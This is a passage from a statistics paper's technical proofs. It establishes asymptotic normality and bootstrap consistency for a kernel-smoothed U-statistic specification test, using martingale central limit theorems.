\leq n,$$ and $\mathcal{F}_{n,m}$ is the $\sigma-$field generated by $\left\{ W_{1},\,\dots,\, W_{n},\, X_{1},\,\dots,\, X_{n},\, Y_{1},\,\dots,\, Y_{m}\right\} .$ Thus $nh^{p/2}I_{0n}=S_{n,n}$. Also define $$V_{n}^{2} = \sum_{i=2}^{n}E\left[G_{n,i}^{2}\mid\mathcal{F}_{n,i-1}\right] = \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sigma_{i}^{2}f_{i}^{2}\left(\sum_{j=1}^{i-1}u_{j}f_{j}K_{nij}\psi_{ij}\right)^{2}$$ where $\sigma_{i}^{2}=\sigma^{2}\left(W_{i},X_{i}\right)$. We can decompose $V_{n}^{2}$ as $$\begin{aligned} V_{n}^{2} & = & \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sigma_{i}^{2}f_{i}^{2}\sum_{j=1}^{i-1}\sum_{k=1}^{i-1}u_{j}f_{j}u_{k}f_{k}K_{nij}K_{nik}\psi_{ij}\psi_{ik}\\ & = & \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\sigma_{i}^{2}f_{i}^{2}u_{j}^{2}f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\\ & & +\dfrac{8h^{p}}{\left(n-1\right)^{2}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{k=1}^{j-1}\sigma_{i}^{2}f_{i}^{2}u_{j}f_{j}u_{k}f_{k}K_{nij}K_{nik}\psi_{ij}\psi_{ik} = A_{n}+B_{n}.\end{aligned}$$ The result follows from the Central Limit Theorem for martingale arrays, see Corollary 3.1 of [@Hall1980]. The conditions required for Corollary 3.1 of [@Hall1980], among which $V_{n}^{2}{\mbox{$\stackrel{p}{\longrightarrow}\,$}}\omega^{2}$, are checked in Lemma \[AAn\] below. Its proof is provided in the Appendix. \[AAn\] Under the conditions of Proposition \[Normality\], 1. \[An\] $A_{n}{\mbox{$\stackrel{p}{\longrightarrow}\,$}}\omega^{2}$, 2. \[Bn\] $B_{n}{\mbox{$\stackrel{p}{\longrightarrow}\,$}}0$, 3. \[Lindebergh\] the martingale difference array $\left\{ G_{n,i},\,\mathcal{F}_{n,i},\,1\leq i\leq n\right\} $ satisfies the Lindeberg condition $$\forall\varepsilon>0,\quad\sum_{i=2}^{n}\mathbb{E} \left[G_{n,i}^{2}I\left(\left|G_{n,i}\right|>\varepsilon\right)\mid\mathcal{F}_{n,i-1}\right] {\mbox{$\stackrel{p}{\longrightarrow}\,$}}0 \, .$$ \[NormalityH1\] Under the conditions of Theorem \[Consistency\] and $H_{1n},$ if $\delta_{n}^{2}nh^{p/2}\rightarrow C$ with $0<C<\infty,$ $nh^{p/2}I_{0n} {\mbox{$\stackrel{d}{\longrightarrow}\,$}}\mathcal{N}\left(C \mu,\omega^{2}\right)$. Let $\varepsilon_{i}=Y_{i}-\mathbb{E}\left[Y_{i}\mid W_{i},\, X_{i}\right]$ and let us decompose $$\begin{aligned} nh^{p/2}I_{0n} & = & \dfrac{h^{p/2}}{n-1}\sum_{i=1}^{n}\sum_{j\neq i}u_{i}f_{i}u_{j}f_{j}K_{nij}\psi_{ij}\\ & = & \dfrac{h^{p/2}}{n-1}\sum_{i=1}^{n}\sum_{j\neq i}\left(\delta_{n}d_{i}+\varepsilon_{i}\right)f_{i}\left(\delta_{n}d_{j}+\varepsilon_{j}\right)f_{j}K_{nij}\psi_{ij}\\ & = & \dfrac{h^{p/2}}{n-1}\sum_{i=1}^{n}\sum_{j\neq i}\varepsilon_{i}f_{i}\varepsilon_{j}f_{j}K_{nij}\psi_{ij}+\dfrac{\delta_{n}h^{p/2}}{n-1}\sum_{i=1}^{n}\sum_{j\neq i}d_{i}f_{i}\left(\delta_{n}d_{j}+2\varepsilon_{j}\right)f_{j}K_{nij}\psi_{ij}\\ &=& C_{0n}+C_{n}.\end{aligned}$$ By Proposition \[Normality\], $C_{0n}{\mbox{$\stackrel{d}{\longrightarrow}\,$}}\mathcal{N}\left(0,\omega^{2}\right). $ As for $C_{n}$, we have $$\mathbb{E}\left[C_{n}\right] = \delta_{n}^{2}nh^{p/2}\mathbb{E}\left[d_{i}f_{i}d_{j}f_{j}K_{nij}\psi_{ij}\right]= \delta_{n}^{2}nh^{p/2}\mu_{n} \, .$$ By repeated application of Fubini’s Theorem, Fourier Inverse formula, Dominated Convergence Theorem, and Parseval’s identity, we obtain $$\begin{aligned} \mu_{n} & = & \mathbb{E}\left[d_{1}f_{2}d_{1}f_{2}K_{n12}\psi_{12}\right]\\ & = & \mathbb{E}\left[\iint d\left(w_{1},X_{1}\right)d\left(w_{2},X_{2}\right)f\left(w_{1}\right)f\left(w_{2}\right)f\left(w_{1}|X_{1}\right)f\left(w_{2}|X_{2}\right)\right.\\ &&\qquad \qquad \qquad \qquad\qquad \qquad\qquad \qquad\qquad \qquad\times \left. h^{-p}K\left(\dfrac{w_{1}-w_{2}}{h}\right)dw_{1}dw_{2}\;\,\psi\left(X_{1}-X_{2}\right)\right]\\ & = & \mathbb{E}\left[ \int\!\!\mathcal{F}\!\left[d\left(\cdot,X_{1}\right)\!f\left(\cdot\right)\pi\left(\cdot\mid X_{1}\right)\right]\!\left(t\right)\mathcal{F}\left[d\left(\cdot,X_{2}\right)\!f\left(\cdot\right)\pi\left(\cdot\mid X_{2}\right)\right]\!\left(-t\right)\mathcal{F}\left[K\right]\left(ht\right)dt\;\psi\left(X_{1}-X_{2}\right)\right]\\ & \to & \mathbb{E}\left[ \left[ \int\mathcal{F}\left[d\left(\cdot,X_{1}\right)f\left(\cdot\right)\pi\left(\cdot\mid X_{1}\right)\right]\left(t\right)\mathcal{F}\left[d\left(\cdot,X_{2}\right)f\left(\cdot\right)\pi\left(\cdot\mid X_{2}\right)\right]\left(-t\right)dt\; \right]\psi\left(X_{1}-X_{2}\right)\right]\\ & = & \mathbb{E}\left[\int d\left(w,X_{1}\right)d\left(w,X_{2}\right)f^{2}\left(w\right)\pi\left(w\mid X_{1}\right)\pi\left(w\mid X_{2}\right)\psi\left(X_{1}-X_{2}\right)dw\right]\\ &=&\int \left[\int \mathcal{F}_X\left[ d\left(w,\cdot\right)\pi\left(w\mid\cdot\right)\right](u) \mathcal{F}_X\left[d\left(w,\cdot\right)\pi\left(w\mid\cdot\right)\right](-u)\mathcal{F}[\psi](u)du \right] f^{2}\left(w\right)dw\\ &=& \iint \left| \mathcal{F}_X\left[ d\left(w,\cdot\right)\pi\left(w\mid\cdot\right)\right](u)\right|^2 \mathcal{F}[\psi](u) f^{2}\left(w\right)du dw =\mu \, .\end{aligned}$$ Moreover, $$\begin{aligned} \mbox{Var}\left[C_{n}\right] & \leq & \dfrac{4\delta_{n}^{4}h^{p}}{\left(n-1\right)^{2}}\sum_{a}\mathbb{E}\left[d_{i}^{2}f_{i}^{2}d_{k}d_{l}f_{k}f_{l}K_{nik}K_{nil}\psi_{ik}\psi_{il}\right]\\ & & +\dfrac{2\delta_{n}^{4}h^{p}}{\left(n-1\right)^{2}}\sum_{a}\mathbb{E}\left[d_{i}^{2}f_{i}^{2}d_{k}^{2}f_{k}^{2}K_{nik}^{2}\psi_{ik}^{2}\right]\\ & & +\dfrac{4\delta_{n}^{2}h^{p}}{\left(n-1\right)^{2}}\sum_{a}\mathbb{E}\left[d_{i}f_{i}d_{j}f_{j}\varepsilon_{k}^{2}f_{k}^{2}K_{nik}K_{njk}\psi_{ik}\psi_{jk}\right]\\ & & +\dfrac{4\delta_{n}^{2}h^{p}}{\left(n-1\right)^{2}}\sum_{a}\mathbb{E}\left[d_{i}^{2}f_{i}^{2}\varepsilon_{k}^{2}f_{k}^{2}K_{nik}^{2}\psi_{ik}^{2}\right]\\ & = & O\left(\delta_{n}^{4}nh^{p}\right)+O\left(\delta_{n}^{4}\right)+O\left(\delta_{n}^{2}nh^{p}\right)+O\left(\delta_{n}^{2}\right).\end{aligned}$$ Therefore $C_{n}=C\mu_{n}+O_p\left(\delta_{n} n^{1/2} h^{p/2}\right) {\mbox{$\stackrel{p}{\longrightarrow}\,$}}C \mu$, and the desired result follows. \[Ustat\] Under the conditions of Theorem \[Consistency\], [(i)]{} : $nh^{p/2}I_{1,3}=\delta_{n}\sqrt{n}h^{p/2}O_{p}\left(1\right)+o_{p}\left(1\right)$, [(ii)]{} : $nh^{p/2}I_{1,5}=o_{p}\left(1\right)$, [(iii)]{} : $nh^{p/2}I_{1,6}=\delta_{n}^{2}nh^{p/2}o_{p}\left(1\right)+o_{p}\left(1\right)$, [(iv)]{} : $nh^{p/2}I_{2,1}=\delta_{n}\sqrt{n}h^{p/2}o_{p}\left(1\right)+\delta_{n}\sqrt{n}h^{p/2}g^{s}O_{p}\left(1\right)+o_{p}\left(1\right)$, [(v)]{} : $nh^{p/2}I_{2,3}=o_{p}\left(1\right)$, [(vi)]{} : $nh^{p/2}I_{3}=nh^{p/2}O_{p}\left(g^{2s}\right)+o_{p}\left(1\right)$. \[Remaining\] Under the conditions of Theorem \[Consistency\], [(i)]{} : $nh^{p/2}I_{1,1}=\delta_{n}^{2}nh^{p/2}o_{p}\left(1\right)+\delta_{n}\sqrt{n}h^{p/2}o_{p}\left(1\right)+o_{p}\left(1\right)$, [(ii)]{} : $nh^{p/2}I_{1,2}=\delta_{n}^{2}nh^{p/2}o_{p}\left(1\right)+\delta_{n}\sqrt{n}h^{p/2}o_{p}\left(1\right)+o_{p}\left(1\right)$, [(iii)]{} : $nh^{p/2}I_{1,4}=\delta_{n}^{2}nh^{p/2}o_{p}\left(1\right)+\delta_{n}\sqrt{n}h^{p/2}o_{p}\left(1\right)+\left(ng^{p}\right)^{-1/2}o_{p}\left(1\right)+o_{p}\left(1\right)$, [(iv)]{} : $nh^{p/2}I_{2,2}=\delta_{n}^{2}nh^{p/2}o_{p}\left(1\right)+\delta_{n}\sqrt{n}h^{p/2}o_{p}\left(1\right)+o_{p}\left(1\right)$. The proofs of the above propositions follow the ones in [@Lavergne2000]). For illustration, we provide in the Appendix the proofs of the first statements of each proposition. #### Case $I_n=\widehat{I}_{n}$. We have the following decomposition $$\label{ilvifl} n^{\left(4\right)}\tilde{I}_{n} = n\left(n-1\right)^{3}\widehat{I}_{n}-n^{\left(3\right)}V_{1n}-2n^{\left(3\right)}V_{2n}+n^{\left(2\right)}V_{3n}$$ $$\begin{aligned} \mbox{where } \quad V_{1n}& = &\dfrac{1}{n^{\left(3\right)}}\sum_{a}\left(Y_{i}-Y_{k}\right)\left(Y_{j}-Y_{k}\right)L_{nik}L_{njk}K_{nij}\psi_{ij}\, ,\\ V_{2n}& = &\dfrac{1}{n^{\left(3\right)}}\sum_{a}\left(Y_{i}-Y_{j}\right)\left(Y_{j}-Y_{k}\right)L_{nij}L_{njk}K_{nij}\psi_{ij}\, , \\ \mbox{and } \quad V_{3n} & = & \dfrac{1}{n^{\left(2\right)}}\sum_{a}\left(Y_{i}-Y_{j}\right)^{2}L_{nij}^{2}K_{nij}\psi_{ij} \, .\end{aligned}$$ Hence, to show that $\widehat{I}_{n}$ has the same asymptotic distribution as $\tilde{I}_{n}$, it is sufficient to investigate the behavior of $V_{1n}$ to $V_{3n}.$ Using $Y_i = r_i + u_i,$ it is straightforward to see that the dominating terms in $V_{1n},V_{2n}$ and $V_{3n}$ are $$V_{13}=\dfrac{1}{n^{\left(3\right)}}\sum_{a}\left(r_{i}-r_{k}\right)\left(r_{j}-r_{k}\right)L_{nik}L_{njk}K_{nij}\psi_{ij},$$ $$V_{23}=\dfrac{1}{n^{\left(3\right)}}\sum_{a}\left(r_{i}-r_{j}\right)\left(r_{j}-r_{k}\right)L_{nij}L_{njk}K_{nij}\psi_{ij}, \quad V_{33}=\dfrac{1}{n^{\left(2\right)}}\sum_{a}\left(r_{i}-r_{j}\right)^{2}L^2_{nij}K_{nij}\psi_{ij},$$ respectively. Now $$\begin{aligned} \mathbb{E}\left[|V_{13}|\right] & = & \mathbb{E}\left[|\left(r_{i}-r_{k}\right)\left(r_{j}-r_{k}\right)L_{nik}L_{njk}K_{nij}| \right]\\ & = & O\left(g^{-p}\right)\mathbb{E}\left[\left|r_{i}-r_{k}\right|\mathbf{L}_{nik}\mathbb{E}\left[\left|r_{j}-r_{k}\right|\mathbf{K}_{nij}\mid Z_{i},Z_{k}\right]\right] = O\left(g^{-p}\right) \, , \\ \mathbb{E}\left[|V_{23}|\right] & = & \mathbb{E}\left[|\left(r_{i}-r_{j}\right)\left(r_{j}-r_{k}\right)L_{nij}L_{njk}K_{nij}|\right] \\ &= & \mathbb{E}\left[\mathbb{E}\left[\left|r_{j}-r_{k}\right|\mathbf{L}_{njk}\mid Z_{j}\right]\left|r_{i}-r_{j}\right|\mathbf{L}_{nij}\mathbf{K}_{nij}\right]\\ & = & o\left(1\right)\mathbb{E}\left[\left|r_{i}-r_{j}\right|\mathbf{L}_{nij}\mathbf{K}_{nij}\right] = o\left(g^{-p}\right) \\ \mathbb{E}\left[|V_{33}|\right] & = & \mathbb{E}\left[\left(r_{i}-r_{j}\right)^{2}L_{nij}^{2}|K_{nij}|\right]\\ & = & O\left(g^{-2p}\right)\mathbb{E}\left[\left(r_{i}-r_{j}\right)^{2}\mathbf{K}_{nij}\right] = o\left(g^{-2p}\right) \, .\end{aligned}$$ It then follows that $nh^{p/2}\left(\tilde{I}_{n}-\widehat{I}_{n}\right)=O_p\left(h^{p/2}g^{-p}\right)$ which is negligible if $h/g^{2}\to0$. The asymptotic irrelevance of the above diagonal terms thus require more restrictive relationships between the bandwidths $h$ and $g$. For the sake of comparison, recall that [@FanLi1996] impose $h^{(p+q)}g^{-2p}\to0$ while [@Lavergne2000] require only $h^{p+q}g^{-p}\to0$. Since we do not smooth the covariates $X$, we are able to further relax the restriction between the two bandwidths. Proof of Corollary \[corr\_test\_o\] ------------------------------------ It suffices to prove $\omega_{n}^{2}-\omega^{2} = o_p(1)$ with $\omega_{n}^{2}$ any of $\widehat{\omega}_{n}^{2}$ or $\tilde{\omega}_{n}^{2}$. First we consider the case $\omega_{n}^{2}=\widehat{\omega}_{n}^{2}.$ A direct approach would consist in replacing the definition of $\hat u_i \hat f_i$ and $\hat u_j \hat f_j$, writing $\widehat{\omega}_{n}^{2}$ as a $U-$statistic of order 6, and studying its mean and variance. [A shorter approach is based on empirical process tools. The price to pay is the stronger condition $n^{7/8}g ^p/\ln n \rightarrow \infty$ instead of $ng ^p \rightarrow \infty.$]{} Let $\Delta \hat f_i = \hat f_i - f_i$, $\Delta \hat r_i \hat f_i = \hat r_i \hat f_i- r_i f_i$, and write $$\label{uifi_unif} \hat u_i \hat f_i = u_if_i + Y_i \Delta \hat f_i - \Delta \hat r_i\hat f_i.$$ \[unif\_omeg\] Under Assumption \[Sample\], if $r(\cdot)f(\cdot) \in \mathcal{U}^{p},$ $L(\cdot)$ is a function of bounded variation, [$g\rightarrow 0,$ and $n^{7/8}g ^p/\ln n \rightarrow \infty,$]{} then $$\sup_{1\leq i\leq n}\{|\Delta \hat r_i\hat f_i| + |\Delta \hat f_i| \} = o_p(1).$$ The proof relies on the uniform convergence of empirical processes and is provided in the Appendix. Now proceed as follows: square Equation (\[uifi\_unif\]), replace $\hat u_i^2 \hat f_i^2$ in the definition of $\widehat{\omega}_{n}^{2},$ and use Lemma \[unif\_omeg\] to deduce that $$\widehat{\omega}_{n}^{2} = \dfrac{2h^{p}}{n^{\left(2\right)}}\sum_{a\left(2\right)} u_{i}^{2} f_{i}^{2} u_{j}^{2} f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2} + o_p(1) \, .$$ Elementary calculations of mean and variance yield $$\dfrac{2h^p}{n^{(2)}}\sum_{a\left(2\right)} u_{i}^{2} f_{i}^{2} u_{j}^{2} f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2} - \omega^{2} = o_p(1),$$ and thus $\widehat{\omega}_{n}^{2} - \omega^{2} = o_p(1).$ To deal with $\tilde{\omega}_{n}^{2}$, note that $\tilde{\omega}_{n}^{2} - \widehat{\omega}_{n}^{2}$ consists of “diagonal” terms plus a term which is $O\left(n^{-1}\tilde{\omega}_{n}^{2}\right)$. By tedious but rather straightforward calculations, one can check that such diagonal terms are each of the form $n^{-1}g^{-p}$ times a $U-$statistic which is bounded in probability. Hence $ \tilde{\omega}_{n}^{2} - \widehat{\omega}_{n}^{2}= o_p(1)$. Proof of Theorem \[Bootstrap Consistency\] ------------------------------------------ Let $\overline{Z}$ denote the sample $(Y_i,W_i,X_i),$ $1\leq i\leq n.$ Since the limit distribution is continuous, it suffices to prove the result pointwise by Polya’s theorem. Hence we show that $\forall t\in\mathbb{R}$, $\mathbb{P}\left[nh^{p/2}I_{n}^{*}/\omega_{n}^{*}\leq t\mid\overline{Z}\right]-\Phi\left(t\right)=o_p(1)$. First, we consider the case $I_n^{*}=\tilde{I}_n$. Consider $$\begin{aligned} I_{n,LV}^{*} & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\eta_{i}\hat{u}_{i}-\eta_{k}\hat{u}_{k}\right)\left(\eta_{j}\hat{u}_{j}-\eta_{l}\hat{u}_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{2}{n^{\left(4\right)}}\sum_{a}\left(\eta_{i}\hat{u}_{i}-\eta_{k}\hat{u}_{k}\right)\left(\hat{r}_{j}-\hat{r}_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{i}-\hat{r}_{k}\right)\left(\hat{r}_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{1}^{*}+2I_{2}^{*}+I_{3}^{*}\end{aligned}$$ where we can further decompose $$\begin{aligned} I_{1}^{*} & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{2}{n^{\left(4\right)}}\sum_{a}\eta_{j}\hat{u}_{j}\eta_{k}\hat{u}_{k}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{k}\hat{u}_{k}\eta_{l}\hat{u}_{l}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{1,1}^{*}+I_{1,2}^{*}+I_{1,3}^{*}\end{aligned}$$ with $$\begin{aligned} I_{1,1}^{*} & = & \dfrac{\left(n-1\right)^{2}}{\left(n-3\right)\left(n-4\right)}\times\dfrac{1}{n^{\left(2\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}\hat{f}_{i}\hat{f}_{j}K_{nij}\psi_{ij}\\ & & -\dfrac{2}{n-4}\times\dfrac{1}{n^{\left(3\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}L_{nik}L_{nij}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{n-4}\times\dfrac{1}{n^{\left(3\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}L_{nik}L_{njk}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{\left(n-3\right)\left(n-4\right)}\times\dfrac{1}{n^{\left(2\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}L_{nij}^{2}K_{nij}\psi_{ij}\\ & = & I_{0n}^{*}-\dfrac{2}{n-4}I_{1,1,1}^{*}-\dfrac{1}{n-4}I_{1,1,2}^{*}-\dfrac{1}{\left(n-3\right)\left(n-4\right)}I_{1,1,3}^{*}.\end{aligned}$$ Now let $D_{n}^{*}=\tilde{I}_{n}^{*}-I_{0n}^{*}$ and write $$\begin{aligned} \Pr\left(\dfrac{nh^{p/2}\tilde{I}_{n}^{*}}{\tilde{\omega}_{n}^{*}} \leq t\mid\overline{Z}\right) & = & \!\!\Pr\left(\dfrac{nh^{p/2}\left(I_{0n}^{*}+D_{n}^{*}\right)}{\tilde{\omega}_{n}^{*}} \leq t\mid\overline{Z}\right)\\ & = & \!\!\Pr\!\!\left(\dfrac{nh^{p/2}I_{0n}^{*}}{\widehat{\omega}_{n}} +\dfrac{nh^{p/2}D_{n}^{*}}{\widehat{\omega}_{n}} +\dfrac{nh^{p/2}\left(I_{0n}^{*}+D_{n}^{*}\right)}{\widehat{\omega}_{n}} \left(\dfrac{\tilde{\omega}_{n}}{\widehat{\omega}_{n}^{*}}-1\right) \leq t\mid\overline{Z}\right).\end{aligned}$$ It thus suffices to prove that $$\Pr\left(\dfrac{nh^{p/2}I_{0n}^{*}}{\hat{\omega}_{n,FL}}\leq t\mid\overline{Z}\right)-\Phi\left(t\right)\xrightarrow{p}0 \qquad \forall t \in \mathbb{R}\, ,$$ $$\label{r_star_1} \dfrac{nh^{p/2}D_{n}^{*}}{\hat{\omega}_{n,FL}}=o_p(1)\, ,\qquad \text{ and } \qquad \dfrac{nh^{p/2}\left(I_{0n}^{*}+D_{n}^{*}\right)}{\hat{\omega}_{n,FL}}\left(\dfrac{\hat{\omega}_{n,FL}}{\hat{\omega}_{n,LV}^{*}}-1\right) =o_{p}\left(1\right).$$ The first result is stated below. Under the conditions of Theorem \[Bootstrap Consistency\], conditionally on the observed sample, the statistic $nh^{p/2}I_{0n}^{*}/\hat{\omega}_{n,FL}$ converges in law to a standard normal distribution. \[BootstrapNormality\] We proceed as in the proof of Proposition \[Normality\] and check the conditions for a CLT for martingale arrays, see Corollary 3.1 of [@Hall1980]. Define the martingale array $\left\{ S_{n,m}^{*},\,\mathcal{F}_{n,m}^{*},\,1\leq m\leq n,\, n\geq1\right\} $ where $\mathcal{F}_{n,m}^{*}$ is the $\sigma$-field generated by $\left\{ \overline{Z},\,\eta_{1},\,\dots,\eta_{m}\right\} $, $S_{n,1}^{*}=0$, and $S_{n,m}^{*}=\sum_{i=1}^{m}G_{n,i}^{*}$ with $$G_{n,i}^{*}=\dfrac{2h^{p/2}}{n-1}\eta_{i}\hat{u}_{i}\sum_{j=1}^{i-1}\eta_{j}\hat{u}_{j}\hat{f}_{i}\hat{f}_{j}K_{nij}\psi_{ij} \, .$$ Then $$I_{0n}^{*} = \dfrac{\left(n-1\right)^{2}}{\left(n-3\right)\left(n-4\right)}\times\dfrac{1}{n^{\left(2\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\eta_{j}\hat{u}_{j}\hat{f}_{i}\hat{f}_{j}K_{nij}\psi_{ij} = \dfrac{\left(n-1\right)^{2}}{\left(n-3\right)\left(n-4\right)} S_{n,n}^{*} \, .$$ Now consider $$\begin{aligned} V_{n}^{2*} & = & \sum_{i=2}^{n}\mathbb{E}\left[G_{n,i}^{2*}\mid\mathcal{F}_{n,i-1}^{*}\right]\\ & = & \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\sum_{k=1}^{i-1}\hat{u}_{i}^{2}\eta_{j}\eta_{k}\hat{u}_{j}\hat{u}_{k}\hat{f}_{i}^{2}\hat{f}_{j}\hat{f}_{k}K_{nij}K_{nik}\psi_{ij}\psi_{ik}\\ & = & \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\hat{u}_{i}^{2}\eta_{j}^{2}\hat{u}_{j}^{2}\hat{f}_{i}^{2}\hat{f}_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\\ & & +\dfrac{8h^{p}}{\left(n-1\right)^{2}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{k=1}^{j-1}\hat{u}_{i}^{2}\eta_{j}\eta_{k}\hat{u}_{j}\hat{u}_{k}\hat{f}_{i}^{2}\hat{f}_{j}\hat{f}_{k}K_{nij}K_{nik}\psi_{ij}\psi_{ik}\\ & = & A_{n}^{*}+B_{n}^{*}.\end{aligned}$$ Note that $\mathbb{E}\left[A_{n}^{*}\mid\overline{Z}\right]=[n/(n-1)]\mathbb{E}\left[\widehat{\omega}_{n}^{2}\right]$ and that $$\begin{aligned} \mbox{Var}\left[\tilde{A}_{n}^{*}\mid\overline{Z}\right] & \leq & \dfrac{16h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{i^{\prime}=2}^{n}\sum_{j=1}^{i\wedge i^{\prime}-1}\hat{u}_{i}^{2}\hat{u}_{i^{\prime}}^{2}\hat{u}_{j}^{4}\hat{f}_{i}^{2}\hat{f}_{i^{\prime}}^{2}\hat{f}_{j}^{4}K_{nij}^{2}K_{ni^{\prime}j}^{2}\psi_{ij}^{2}\psi_{i^{\prime}j}^{2}\\ & \leq & \dfrac{16h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\hat{u}_{i}^{4}\hat{u}_{j}^{4}\hat{f}_{i}^{4}\hat{f}_{j}^{4}K_{nij}^{4}\psi_{ij}^{4}\\ & & +\dfrac{32h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=2}^{i-1}\sum_{j=1}^{i^{\prime}-1}\hat{u}_{i}^{2}\hat{u}_{i^{\prime}}^{2}\hat{u}_{j}^{4}\hat{f}_{i}^{2}\hat{f}_{i^{\prime}}^{2}\hat{f}_{j}^{4}K_{nij}^{2}K_{ni^{\prime}j}^{2}\psi_{ij}^{2}\psi_{i^{\prime}j}^{2}\\ &=& Q_{1n}+Q_{2n}.\end{aligned}$$ On the other hand, $$\begin{aligned} \mathbb{E}\left[B_{n}^{*2}\mid\overline{Z}\right] & = & \dfrac{64h^{2p}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=3}^{n}\sum_{j=2}^{i\wedge i^{\prime}-1}\sum_{k=1}^{j-1}\hat{u}_{i}^{2}\hat{u}_{i^{\prime}}^{2}\hat{u}_{j}^{2}\hat{u}_{k}^{2}\hat{f}_{i}^{2}\hat{f}_{i^{\prime}}^{2}\hat{f}_{j}^{2}\hat{f}_{k}^{2}K_{nij}K_{ni^{\prime}j}K_{nik}K_{ni^{\prime}k}\psi_{ij}\psi_{i^{\prime}j}\psi_{ik}\psi_{i^{\prime}k}\\ & = & \dfrac{64h^{2p}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{k=1}^{j-1}\hat{u}_{i}^{4}\hat{u}_{j}^{2}\hat{u}_{k}^{2}\hat{f}_{i}^{4}\hat{f}_{j}^{2}\hat{f}_{k}^{2}K_{nij}^{2}K_{nik}^{2}\psi_{ij}^{2}\psi_{ik}^{2}\\ & & +\dfrac{128h^{2p}}{\left(n-1\right)^{4}}\sum_{i=4}^{n}\sum_{i^{\prime}=3}^{i-1}\sum_{j=2}^{i^{\prime}-1}\sum_{k=1}^{j-1}\hat{u}_{i}^{2}\hat{u}_{i^{\prime}}^{2}\hat{u}_{j}^{2}\hat{u}_{k}^{2}\hat{f}_{i}^{2}\hat{f}_{i^{\prime}}^{2}\hat{f}_{j}^{2}\hat{f}_{k}^{2}K_{nij}K_{ni^{\prime}j}K_{nik}K_{ni^{\prime}k}\psi_{ij}\psi_{i^{\prime}j}\psi_{ik}\psi_{i^{\prime}k} \\ &=& Q_{3n}+Q_{4n}.\end{aligned}$$ Finally the Lindeberg condition involves $$\begin{aligned} & \sum_{i=1}^{n}\mathbb{E}\left[G_{n,i}^{2*}I\left(\left|G_{n,i}^{*}\right|>\varepsilon\right)\mid\mathcal{F}_{n,i-1}^{*}\right]\\ \leq & \dfrac{1}{\varepsilon^{4}}\sum_{i=1}^{n}\mathbb{E}\left[G_{n,i}^{4*}\mid\mathcal{F}_{n,i-1}^{*}\right]\\ \leq & \dfrac{16h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\varepsilon^{4}\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\sum_{k=1}^{i-1}\hat{u}_{i}^{4}\hat{u}_{j}^{2}\hat{u}_{k}^{2}\hat{f}_{i}^{4}\hat{f}_{j}^{2}\hat{f}_{k}^{2}K_{nij}^{2}K_{nik}^{2}\psi_{ij}^{2}\psi_{ik}^{2}\\ \leq & \dfrac{16h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\varepsilon^{4}\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\hat{u}_{i}^{4}\hat{u}_{j}^{4}\hat{f}_{i}^{4}\hat{f}_{j}^{4}K_{nij}^{4}\psi_{ij}^{4}\\ & +\dfrac{32h^{2p}\mathbb{E}\left[\eta^{4}\right]}{\varepsilon^{4}\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{k=1}^{j-1}\hat{u}_{i}^{4}\hat{u}_{j}^{2}\hat{u}_{k}^{2}\hat{f}_{i}^{4}\hat{f}_{j}^{2}\hat{f}_{k}^{2}K_{nij}^{2}K_{nik}^{2}\psi_{ij}^{2}\psi_{ik}^{2}\\ &= Q_{5n}+Q_{6n}.\end{aligned}$$ It thus suffices to show that $Q_{jn}= o_{p}(1)$, $j=1,\ldots 6$. Now, there exist positive random variables $\tilde{\gamma}_{1n}$ and $\tilde{\gamma}_{2n}$ such that $\tilde{\gamma}_{1n}+\tilde{\gamma}_{2n}=o_{p}\left(1\right)$ and $$\hat{u}_{i}^{2k}\hat{f}_{i}^{2k}\leq 3^{2k-1} \left(u_{i}^{2k}f_{i}^{2k}+Y_{i}^{2k}f_{i}^{2k} 